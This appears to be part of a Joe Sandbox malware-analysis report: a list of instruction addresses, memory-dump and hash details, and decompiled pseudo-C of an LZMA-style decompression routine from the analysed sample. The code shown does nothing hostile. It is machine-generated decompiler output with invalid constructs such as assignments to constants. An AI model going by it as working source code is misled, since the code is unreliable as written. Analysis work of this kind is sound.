                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x0040744d
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407002

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                              • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
